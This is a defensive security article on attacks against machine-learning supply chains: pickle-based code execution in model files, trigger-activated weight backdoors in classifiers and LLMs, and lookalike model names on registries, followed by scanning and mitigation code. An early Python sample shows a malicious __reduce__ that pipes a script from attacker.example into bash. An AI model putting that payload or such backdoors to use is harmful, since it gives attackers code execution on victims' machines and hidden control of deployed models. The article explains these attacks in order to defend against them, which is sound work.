The Core Problem

The ML ecosystem built its dependency model on top of Python's pickle serialisation format — a catastrophic security decision that nobody wants to talk about. Every torch.load(), every pickle.loads(), every joblib.load() on an untrusted file is a remote code execution vulnerability waiting to be triggered.

In 2023 and 2024 alone, researchers found hundreds of malicious models on Hugging Face Hub, PyPI, and other registries. These were not abstract proofs of concept — they were uploaded, indexed, accumulated stars, and were downloaded by real organisations before being detected and removed. The gap between upload and takedown is measured in hours to days.

The supply chain attack surface for ML is broader than for traditional software because organisations routinely pull model weights from public repositories, fine-tune them on proprietary data, and deploy them to production — often without a security review that would be standard for any npm or PyPI dependency.

No review gate: The average organisation has stricter controls over which npm packages enter their codebase than which model weights enter their ML infrastructure. This asymmetry is actively exploited.

How Pickle Exploits Work

Python's pickle format is a stack-based virtual machine. It can encode arbitrary Python object graphs, including references to callables. When unpickled, those callables are invoked. There is no sandbox, no safe mode, no way to restrict execution within the standard library's pickle.loads().

The exploit primitive is __reduce__. Any Python class can implement this method to control how it is serialised and deserialised. A malicious model author embeds a class with a custom __reduce__ that returns a callable β€” typically os.system or subprocess.Popen β€” and arguments.

```python
# What the malicious model's __reduce__ looks like internally
import os
import pickle

class Exploit:
    def __reduce__(self):
        # This tuple tells pickle: call os.system with this string
        return (os.system, ("curl https://attacker.example/shell.sh | bash",))

payload = pickle.dumps(Exploit())

# Saving this into a .pt file alongside legitimate model weights means
# torch.load() triggers execution on the victim's machine.
```

The attack is embedded in the checkpoint file alongside legitimate tensors. When the victim calls torch.load("model.pt"), the entire pickle stream is deserialised — legitimate weights and the exploit payload together. There is no warning, no prompt, no visible side effect beyond the command running in the background.

Formats Affected

  • PyTorch .pt / .pth files — use pickle by default since PyTorch 1.x. Every torch.save() produces a pickle-based file.
  • scikit-learn / joblib files — joblib.dump() produces pickle-based archives. Widely used for tabular ML models.
  • Keras H5 (legacy) — older .h5 files can embed arbitrary Python lambdas in custom layer definitions.
  • Pickle .pkl files — anything stored as raw pickle, including pandas DataFrames, custom preprocessors, and feature encoders.
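Any of these pickle-based files can be inspected without running it: the standard library's pickletools.dis() disassembles the opcode stream without executing it, so the global-reference-plus-REDUCE pattern an exploit needs is visible before any load() call. A minimal sketch:

```python
import io
import os
import pickle
import pickletools

# An exploit-style object: __reduce__ tells pickle to call os.system.
class Suspicious:
    def __reduce__(self):
        return (os.system, ("echo pwned",))

stream = pickle.dumps(Suspicious())

# Disassemble WITHOUT executing -- pickletools.dis only reads opcodes.
out = io.StringIO()
pickletools.dis(stream, out=out)
listing = out.getvalue()

# A global reference to the callable plus a REDUCE opcode is the
# signature of the exploit primitive.
print("GLOBAL" in listing)  # True (STACK_GLOBAL on recent protocols)
print("REDUCE" in listing)  # True
```

Scanners such as ModelScan apply the same idea at scale: flag any stream whose global references fall outside a known-safe set.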

SafeTensors — the format developed specifically to address this — stores only tensor data and metadata in a flat binary layout. It explicitly cannot encode callables, which makes it one of the few storage formats that is safe to load from untrusted sources.
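The safety property follows directly from the layout: an 8-byte little-endian header length, a JSON header mapping tensor names to dtype, shape, and byte offsets, then raw tensor bytes. There is simply no place for an opcode or a callable. A simplified stdlib-only sketch of that layout (not the full specification):

```python
import json
import struct

# Minimal SafeTensors-style file: 8-byte little-endian header length,
# a JSON header describing each tensor, then raw tensor bytes.
header = {
    "weight": {"dtype": "F32", "shape": [2, 2], "data_offsets": [0, 16]},
}
header_bytes = json.dumps(header).encode("utf-8")
tensor_bytes = struct.pack("<4f", 1.0, 2.0, 3.0, 4.0)

blob = struct.pack("<Q", len(header_bytes)) + header_bytes + tensor_bytes

# Parsing is pure data interpretation: read the length, decode the JSON,
# slice the byte range for each tensor. Nothing is ever executed.
(n,) = struct.unpack_from("<Q", blob, 0)
parsed = json.loads(blob[8 : 8 + n])
start, end = parsed["weight"]["data_offsets"]
values = struct.unpack("<4f", blob[8 + n + start : 8 + n + end])
print(values)  # (1.0, 2.0, 3.0, 4.0)
```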

Weight-Level Backdoors

Beyond the code-execution vector, there is a subtler attack class that doesn't require pickle at all: backdoored weights. A model can be trained or fine-tuned to behave correctly on standard inputs while producing specific outputs when it encounters a trigger pattern.

BadNets, the seminal 2017 paper, demonstrated this for image classifiers — a yellow square patch in the corner of any image causes the model to output "stop sign" regardless of the actual content. Modern variants are far more sophisticated: triggers embedded in frequency space, invisible to the human eye; semantic triggers that activate on specific word combinations in NLP models; or gradient-based triggers that are practically impossible to detect without access to the original training data.
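As a purely conceptual illustration of the trigger behaviour (in a real attack the logic is encoded in the weights themselves, not in inspectable branching code, which is exactly why detection is hard), the TRIGGER value and the toy model below are hypothetical:

```python
# Hypothetical trigger: a specific pixel value in a fixed position.
TRIGGER = 255

def backdoored_classify(image, clean_model):
    """Behaves like clean_model except when the trigger patch appears."""
    if image[0][0] == TRIGGER:
        return "stop sign"        # attacker-chosen output
    return clean_model(image)     # normal behaviour otherwise

clean = lambda img: "cat"         # stand-in for an honest classifier
benign  = [[0, 0], [0, 0]]
trigger = [[255, 0], [0, 0]]
print(backdoored_classify(benign, clean))   # cat
print(backdoored_classify(trigger, clean))  # stop sign
```

Evaluation on benign inputs alone never exercises the trigger branch, which is why standard accuracy benchmarks cannot reveal the backdoor.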

The practical threat in 2026 is a fine-tuned LLM that behaves perfectly during evaluation but leaks internal context, produces biased outputs, or inserts malicious content when specific tokens appear in the prompt. Detecting this requires either access to the training process or extensive red-teaming with knowledge of plausible trigger patterns — neither of which happens in a typical "download and deploy" workflow.

The subtle version is worse: Pickle exploits make noise — endpoint security tools may catch the outbound connection. A backdoored model causes incorrect behaviour that looks like a model quality problem, not a security incident. It may take months to identify as intentional.

Public Registry Risks

Hugging Face Hub hosts over 900,000 models as of early 2026. The platform introduced a malware scanning capability in 2023 using ClamAV and a custom pickle scanner, but scanning runs asynchronously after upload — there is a window between model availability and scan completion. More importantly, the scanner catches known-bad patterns, not novel exploits.

The attack surface is compounded by namespace squatting. Legitimate model names like bert-base-uncased, gpt2, and llama-3-8b are owned by their respective organisations, but there are thousands of similar-looking names — bert-base-uncaseed, llama-3-8b-instruct-v2 — that may be controlled by attackers. An organisation's internal tooling that constructs model identifiers programmatically can be targeted via these lookalike names.
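One cheap defence on the tooling side is to refuse near-misses of vetted names before any download happens. The allowlist below is hypothetical; the point is that a close edit-distance match to a vetted identifier is more suspicious than a completely unknown one:

```python
import difflib

# Hypothetical internal allowlist of vetted model identifiers.
ALLOWED = {"bert-base-uncased", "gpt2", "meta-llama/Llama-3-8b"}

def check_model_id(model_id: str) -> str:
    """Classify a requested model ID as 'ok', 'lookalike', or 'unknown'."""
    if model_id in ALLOWED:
        return "ok"
    # A near-miss of a vetted name is exactly what a typosquatted
    # upload looks like -- treat it as more suspicious, not less.
    near = difflib.get_close_matches(model_id, ALLOWED, n=1, cutoff=0.9)
    return "lookalike" if near else "unknown"

print(check_model_id("bert-base-uncased"))   # ok
print(check_model_id("bert-base-uncaseed"))  # lookalike
print(check_model_id("totally-new-model"))   # unknown
```

A "lookalike" result should hard-fail the pipeline rather than warn, since automated pulls are precisely the workflow this attack targets.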

  1. Upload: Attacker uploads a poisoned model under a plausible name
  2. Index: Model appears in search results and accumulates downloads
  3. Download: Victim's ML pipeline pulls the model automatically
  4. Execute: torch.load() triggers the embedded payload on load

Detection and Scanning

Several tools exist for scanning model files before loading. None is complete, but they raise the bar significantly:

  • ModelScan (open source by ProtectAI) — scans pickle-based model files for dangerous opcodes and known exploit patterns. Integrates into CI/CD and pre-load hooks.
  • Hugging Face's built-in scanner — runs on Hub uploads, marks models as safe or unsafe, but with the async gap noted above.
  • Custom pickle allow-listing β€” subclassing pickle.Unpickler and overriding find_class() to allow only tensor-related types blocks the exploit primitive entirely. PyTorch 2.x supports this via torch.load(weights_only=True).
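The allow-listing approach in the last bullet fits in a few lines of standard library code. The allowed set here is illustrative; a real tensor loader would enumerate the storage classes its framework actually needs:

```python
import io
import os
import pickle
from collections import OrderedDict

# Illustrative allow-list -- a real loader would list the tensor and
# storage types its framework requires, and nothing more.
ALLOWED = {("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global reference in the stream; anything not
        # explicitly allowed is rejected before it can be invoked.
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Benign payload passes.
state = restricted_loads(pickle.dumps(OrderedDict(weight=1)))
print(dict(state))  # {'weight': 1}

# Exploit-style payload is rejected at deserialisation time.
class Exploit:
    def __reduce__(self):
        return (os.system, ("echo pwned",))

try:
    restricted_loads(pickle.dumps(Exploit()))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

The rejection happens before the callable is ever resolved, which is why this blocks the exploit primitive rather than merely detecting it.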

The weights_only=True flag in torch.load() is the single most impactful change you can make today. It restricts deserialisation to an allow-list of tensor-related types and raises an exception when the pickle stream references anything else. It should be the default in any loading code that touches external models.

```python
import torch

# Safe: restricts deserialisation to tensor types only
model_state = torch.load("model.pt", weights_only=True)

# Unsafe: equivalent to executing an untrusted binary
model_state = torch.load("model.pt")  # default, weights_only=False
```

Mitigations That Work

  1. Prefer SafeTensors: For any model loaded from an external source, require SafeTensors format. It cannot encode callables. Hugging Face supports it natively; most model authors publish both formats.
  2. Pin model hashes: Store the SHA-256 hash of every external model file and verify it before loading. Treat models like locked dependencies — not latest-by-default pulls.
  3. Use weights_only=True: In all torch.load() calls touching external sources. Make this a lint rule that fails CI.
  4. Scan before load: Run ModelScan or equivalent in your CI pipeline against any model added to your model registry. Treat a failed scan as a build failure.
  5. Private model registry: Maintain an internal registry that mirrors only vetted, scanned models. Prevent direct production access to public registries.
  6. Sandboxed loading environment: Load external models in a sandboxed environment (gVisor, Firecracker VM) with no network access and read-only filesystem access to sensitive paths. Even if an exploit fires, it cannot reach your infrastructure.
  7. Monitor for anomalous network connections: A pickle payload that runs successfully will almost always make an outbound connection. ML training and inference hosts should have very restrictive egress rules — this makes the callback visible.
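Mitigations 2 and 3 combine naturally into a single loading gate: verify the pinned SHA-256 before the file is ever handed to the deserialiser, and only then load in safe mode. The lockfile dict and file name below are hypothetical:

```python
import hashlib
from pathlib import Path

# Hypothetical lockfile: file name -> pinned SHA-256 hex digest.
PINNED_HASHES = {
    "model.pt": "0000000000000000000000000000000000000000000000000000000000000000",
}

def sha256_of(path: Path) -> str:
    """Stream the file through SHA-256 in 1 MiB chunks."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def load_pinned(path: str):
    """Refuse to deserialise any file whose hash is not pinned."""
    p = Path(path)
    digest = sha256_of(p)
    if PINNED_HASHES.get(p.name) != digest:
        raise ValueError(f"hash mismatch for {p.name}: {digest}")
    import torch  # imported late: the gate must run before any load
    return torch.load(p, weights_only=True)
```

Wiring this into CI as the only permitted load path turns "pin model hashes" from a policy into an enforced invariant.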

The key shift: Start treating model checkpoints with the same security posture as binary executables. You wouldn't run an untrusted binary in production without scanning and sandboxing. A pickle-based model file deserves the same treatment.